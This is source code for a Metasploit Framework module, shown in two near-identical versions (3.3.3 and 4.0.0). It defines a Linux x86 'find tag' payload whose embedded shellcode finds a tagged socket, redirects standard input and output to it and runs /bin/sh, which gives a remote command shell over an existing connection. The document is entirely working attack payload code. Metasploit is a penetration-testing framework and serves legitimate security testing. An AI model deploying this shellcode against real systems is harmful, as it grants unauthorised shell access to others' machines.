==> metasploit-3.3.3.tbz: share/metasploit/modules/payloads/singles/linux/x86/shell_find_tag.rb <==
##
# $Id: shell_find_tag.rb 6479 2009-04-13 14:33:26Z kris $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'
require 'msf/core/handler/find_tag'
require 'msf/base/sessions/command_shell'


module Metasploit3

	include Msf::Payload::Single
	include Msf::Payload::Linux
	
	def initialize(info = {})
		super(merge_info(info,
			'Name'          => 'Linux Command Shell, Find Tag Inline',
			'Version'       => '$Revision: 6479 $',
			'Description'   => 'Spawn a shell on an established connection (proxy/nat safe)',
			'Author'        => 'skape',
			'License'       => MSF_LICENSE,
			'Platform'      => 'linux',
			'Arch'          => ARCH_X86,
			'Handler'       => Msf::Handler::FindTag,
			'Session'       => Msf::Sessions::CommandShell,
			'Payload'       =>
				{
					'Offsets' =>
						{
							'TAG' => [ 0x1a, 'RAW' ],
						},
					'Payload' =>
						"\x31\xdb\x53\x89\xe6\x6a\x40\xb7\x0a\x53\x56\x53\x89\xe1\x86\xfb" +
						"\x66\xff\x01\x6a\x66\x58\xcd\x80\x81\x3e\x6d\x73\x66\x21\x75\xf0" +
						"\x5f\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b" +
						"\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52" +
						"\x53\x89\xe1\xcd\x80"
				}
			))
	end
	
	#
	# Ensures the setting of TAG to a four byte value
	#
	def generate
		datastore['TAG'] = _find_tag

		super
	end

end

==> metasploit-4.0.0.tbz: share/metasploit/modules/payloads/singles/linux/x86/shell_find_tag.rb <==
##
# $Id: shell_find_tag.rb 11421 2010-12-27 17:46:42Z egypt $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/handler/find_tag'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module Metasploit3

	include Msf::Payload::Single
	include Msf::Payload::Linux
	include Msf::Sessions::CommandShellOptions

	def initialize(info = {})
		super(merge_info(info,
			'Name'          => 'Linux Command Shell, Find Tag Inline',
			'Version'       => '$Revision: 11421 $',
			'Description'   => 'Spawn a shell on an established connection (proxy/nat safe)',
			'Author'        => 'skape',
			'License'       => MSF_LICENSE,
			'Platform'      => 'linux',
			'Arch'          => ARCH_X86,
			'Handler'       => Msf::Handler::FindTag,
			'Session'       => Msf::Sessions::CommandShellUnix,
			'Payload'       =>
				{
					'Offsets' =>
						{
							'TAG' => [ 0x1a, 'RAW' ],
						},
					'Payload' =>
						"\x31\xdb\x53\x89\xe6\x6a\x40\xb7\x0a\x53\x56\x53\x89\xe1\x86\xfb" +
						"\x66\xff\x01\x6a\x66\x58\xcd\x80\x81\x3e\x6d\x73\x66\x21\x75\xf0" +
						"\x5f\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b" +
						"\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52" +
						"\x53\x89\xe1\xcd\x80"
				}
			))
	end

	#
	# Ensures the setting of TAG to a four byte value
	#
	def generate
		datastore['TAG'] = _find_tag

		super
	end

end
